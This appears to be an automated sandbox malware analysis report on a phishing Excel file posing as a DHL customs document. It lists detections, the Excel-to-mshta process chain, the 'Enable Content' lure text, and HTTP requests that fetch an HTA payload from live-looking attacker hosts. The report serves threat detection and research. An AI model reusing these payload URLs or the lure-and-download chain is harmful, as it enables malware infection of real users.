Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL AWB CUSTOM CLEARANCE.xls

Overview

General Information

Sample name:DHL AWB CUSTOM CLEARANCE.xls
Analysis ID:1591180
MD5:3954d9504039a8711e3ab29115d8054f
SHA1:d0f3ceaf0393dd82d12b66dfcf5144ea1413e31d
SHA256:26b53cef2e34ea99b37ad6e84736eeaa1851043d98b85ce831c946674b1ad1d8
Tags:xlsuser-lowmal3
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Sigma detected: Suspicious Microsoft Office Child Process
Detected non-DNS traffic on DNS port
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w11x64_office
  • EXCEL.EXE (PID: 8548 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • mshta.exe (PID: 6416 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 36D15DDE6D71802D9588CC0D48EDF8EA)
    • splwow64.exe (PID: 8864 cmdline: C:\Windows\splwow64.exe 12288 MD5: AF4A7EBF6114EE9E6FBCC910EC3C96E6)
  • EXCEL.EXE (PID: 9064 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\DHL AWB CUSTOM CLEARANCE.xls" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 8548, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 6416, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 14.103.79.10, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 8548, Protocol: tcp, SourceIp: 192.168.2.24, SourceIsIpv6: false, SourcePort: 63305
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.24, DestinationIsIpv6: false, DestinationPort: 63305, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 8548, Protocol: tcp, SourceIp: 14.103.79.10, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: DHL AWB CUSTOM CLEARANCE.xlsAvira: detected
Source: DHL AWB CUSTOM CLEARANCE.xlsVirustotal: Detection: 25%Perma Link
Source: DHL AWB CUSTOM CLEARANCE.xlsReversingLabs: Detection: 34%
Source: DHL AWB CUSTOM CLEARANCE.xlsJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.24:63309 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
Source: global trafficDNS query: name: s.deemos.com
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:63309 -> 13.107.253.45:443
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:63309 -> 13.107.253.45:443
Source: global trafficTCP traffic: 192.168.2.24:63309 -> 13.107.253.45:443
Source: global trafficTCP traffic: 192.168.2.24:63309 -> 13.107.253.45:443
Source: global trafficTCP traffic: 192.168.2.24:63309 -> 13.107.253.45:443
Source: global trafficTCP traffic: 192.168.2.24:63309 -> 13.107.253.45:443
Source: global trafficTCP traffic: 192.168.2.24:63309 -> 13.107.253.45:443
Source: global trafficTCP traffic: 192.168.2.24:63309 -> 13.107.253.45:443
Source: global trafficTCP traffic: 192.168.2.24:63309 -> 13.107.253.45:443
Source: global trafficTCP traffic: 192.168.2.24:63309 -> 13.107.253.45:443
Source: global trafficTCP traffic: 192.168.2.24:50593 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.24:50593
Source: global trafficTCP traffic: 192.168.2.24:50593 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.24:50593
Source: global trafficTCP traffic: 192.168.2.24:50593 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.24:50593
Source: global trafficTCP traffic: 192.168.2.24:50593 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.24:58522 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.24:58522
Source: global trafficTCP traffic: 192.168.2.24:58522 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.24:58522 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.24:58522
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.24:58522
Source: global trafficTCP traffic: 192.168.2.24:58522 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.24:58522
Source: global trafficTCP traffic: 192.168.2.24:58522 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.24:63302 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.24:63302
Source: global trafficTCP traffic: 192.168.2.24:63302 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.24:63302
Source: global trafficTCP traffic: 192.168.2.24:63302 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.24:63302
Source: global trafficTCP traffic: 192.168.2.24:63302 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:63305
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:63305
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:63305
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:63305
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:63305
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:63305
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:63305
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:63305
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:63305
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:63305
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:63305 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:63305
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.24:63306
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.24:63306 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.24:63309 -> 13.107.253.45:443
Source: global trafficTCP traffic: 13.107.253.45:443 -> 192.168.2.24:63309
Source: global trafficTCP traffic: 192.168.2.24:63309 -> 13.107.253.45:443
Source: global trafficTCP traffic: 192.168.2.24:63309 -> 13.107.253.45:443
Source: global trafficTCP traffic: 13.107.253.45:443 -> 192.168.2.24:63309
Source: global trafficTCP traffic: 13.107.253.45:443 -> 192.168.2.24:63309
Source: global trafficTCP traffic: 192.168.2.24:63309 -> 13.107.253.45:443
Source: global trafficTCP traffic: 192.168.2.24:63309 -> 13.107.253.45:443
Source: global trafficTCP traffic: 13.107.253.45:443 -> 192.168.2.24:63309
Source: global trafficTCP traffic: 13.107.253.45:443 -> 192.168.2.24:63309
Source: global trafficTCP traffic: 192.168.2.24:63309 -> 13.107.253.45:443
Source: global trafficTCP traffic: 13.107.253.45:443 -> 192.168.2.24:63309
Source: global trafficTCP traffic: 13.107.253.45:443 -> 192.168.2.24:63309
Source: global trafficTCP traffic: 13.107.253.45:443 -> 192.168.2.24:63309
Source: global trafficTCP traffic: 192.168.2.24:63309 -> 13.107.253.45:443
Source: global trafficTCP traffic: 192.168.2.24:63309 -> 13.107.253.45:443
Source: global trafficTCP traffic: 13.107.253.45:443 -> 192.168.2.24:63309
Source: global trafficTCP traffic: 192.168.2.24:63309 -> 13.107.253.45:443
Source: global trafficTCP traffic: 13.107.253.45:443 -> 192.168.2.24:63309
Source: excel.exeMemory has grown: Private usage: 2MB later: 136MB
Source: global trafficTCP traffic: 192.168.2.24:63302 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.24:50593 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.24:58522 -> 1.1.1.1:53
Source: Joe Sandbox ViewIP Address: 14.103.79.10 14.103.79.10
Source: Joe Sandbox ViewIP Address: 13.107.253.45 13.107.253.45
Source: Joe Sandbox ViewJA3 fingerprint: 258a5a1e95b8a911872bae9081526644
Source: global trafficHTTP traffic detected: GET /hANTnNH4?&astrology=wet%20&abolishment=scintillating&pavement HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/meno/clearpciturewithhersheisverybeautifulgirl.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /hANTnNH4?&astrology=wet%20&abolishment=scintillating&pavement HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rules/rule170146v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /xampp/meno/clearpciturewithhersheisverybeautifulgirl.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 131.226.2.34
Source: global trafficDNS traffic detected: DNS query: s.deemos.com
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: Primary1736878516871306100_E4A4D614-8679-4ABF-A7C4-2E7161D00903.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40/flatfontassets.pkg
Source: DHL AWB CUSTOM CLEARANCE.xls, 95131000.0.drString found in binary or memory: https://s.deemos.com/hANTnNH4?&astrology=wet
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63305
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63309
Source: unknownNetwork traffic detected: HTTP traffic on port 63309 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63305 -> 443
Source: unknownHTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.24:63309 version: TLS 1.2

System Summary

barindex
Source: screenshotOCR: document is protected If this document was the yellow bar above Once you have enabled editing. pleas
Source: screenshotOCR: protected documents This document is protected If this document was the yellow bar above Once you ha
Source: screenshotOCR: Enable Content" from the yellow bar above 27 1: Above price is based on EXT China, not included any
Source: screenshotOCR: document is protected If this document was the yellow bar above Once you have enabled editing. pleas
Source: screenshotOCR: protected documents This document is protected If this document was the yellow bar above Once you ha
Source: screenshotOCR: Enable Content" from the yellow bar above 27 1: Above price is based on EXT China, not included any
Source: screenshotOCR: document is protected If this document was the yellow bar above Once you have enabled editing. pleas
Source: screenshotOCR: protected documents This document is protected If this document was the yellow bar above Once you ha
Source: screenshotOCR: Enable Content" from the yellow bar above 27 1: Above price is based on EXT China, not included any
Source: screenshotOCR: document is protected If this document was the yellow bar above Once you have enabled editing. pleas
Source: screenshotOCR: protected documents This document is protected If this document was the yellow bar above Once you ha
Source: screenshotOCR: Enable Content" from the yellow bar above 27 1: Above price is based on EXT China, not included any
Source: screenshotOCR: document is protected If this document was the yellow bar above Once you have enabled editing. pleas
Source: screenshotOCR: protected documents This document is protected If this document was the yellow bar above Once you ha
Source: screenshotOCR: Enable Content" from the yellow bar above 27 1: Above price is based on EXT China, not included any
Source: screenshotOCR: document is protected Initial calculation started Initial calculation ended Cargo arm connected Load
Source: screenshotOCR: document is protected Initial calculation started Initial calculation ended Cargo arm connected Load
Source: screenshotOCR: document is protected Initial calculation started Initial calculation ended Cargo arm connected Load
Source: screenshotOCR: document is protected If this document was the yellow bar above Once you have enabled 3 'ting. pleas
Source: screenshotOCR: Enable Content- from the yellow bar above 12/7/224 12/7/ 224 12/7/224 12/7/224 13/7/224 13
Source: DHL AWB CUSTOM CLEARANCE.xlsOLE: Microsoft Excel 2007+
Source: DHL AWB CUSTOM CLEARANCE.xlsOLE: Microsoft Excel 2007+
Source: DHL AWB CUSTOM CLEARANCE.xlsOLE: Microsoft Excel 2007+
Source: 95131000.0.drOLE: Microsoft Excel 2007+
Source: 95131000.0.drOLE: Microsoft Excel 2007+
Source: DHL AWB CUSTOM CLEARANCE.xlsOLE indicator, VBA macros: true
Source: DHL AWB CUSTOM CLEARANCE.xlsStream path 'MBD00438E10/\x1Ole' : https://s.deemos.com/hANTnNH4?&astrology=wet &abolishment=scintillating&pavementtSAfSM~H8KKG<a;TcKVdhDYiP72WPkNBlhOKhxDehl5sPFT6IKMLrSvLKcEPMne4eIKzLDCDeIBVGnW724X15EubTxrhZW72bdkEQd5eCcqUSWgDwBSDk8Z060asyQG8k6znuuI2N3G00dDERAOfF4GrCX5eYXvJnC6MbFApwrN6ukT3OCPLsNk9CNekUCFxrG7zRFaR1GtKG1GnSgKA7zrO52U5g8VEhRinRubeVGT26qdUOmhQTyrwI4UqML}ut,U3 0@cX<"u
Source: 95131000.0.drStream path 'MBD00438E10/\x1Ole' : https://s.deemos.com/hANTnNH4?&astrology=wet &abolishment=scintillating&pavementtSAfSM~H8KKG<a;TcKVdhDYiP72WPkNBlhOKhxDehl5sPFT6IKMLrSvLKcEPMne4eIKzLDCDeIBVGnW724X15EubTxrhZW72bdkEQd5eCcqUSWgDwBSDk8Z060asyQG8k6znuuI2N3G00dDERAOfF4GrCX5eYXvJnC6MbFApwrN6ukT3OCPLsNk9CNekUCFxrG7zRFaR1GtKG1GnSgKA7zrO52U5g8VEhRinRubeVGT26qdUOmhQTyrwI4UqML}ut,U3 0@cX<"u
Source: ~DF3F1E3330D4663D02.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal80.expl.winXLS@6/15@2/3
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\95131000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{E4A4D614-8679-4ABF-A7C4-2E7161D00903} - OProcSessId.datJump to behavior
Source: DHL AWB CUSTOM CLEARANCE.xlsOLE indicator, Workbook stream: true
Source: 95131000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: DHL AWB CUSTOM CLEARANCE.xlsVirustotal: Detection: 25%
Source: DHL AWB CUSTOM CLEARANCE.xlsReversingLabs: Detection: 34%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\DHL AWB CUSTOM CLEARANCE.xls"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -EmbeddingJump to behavior
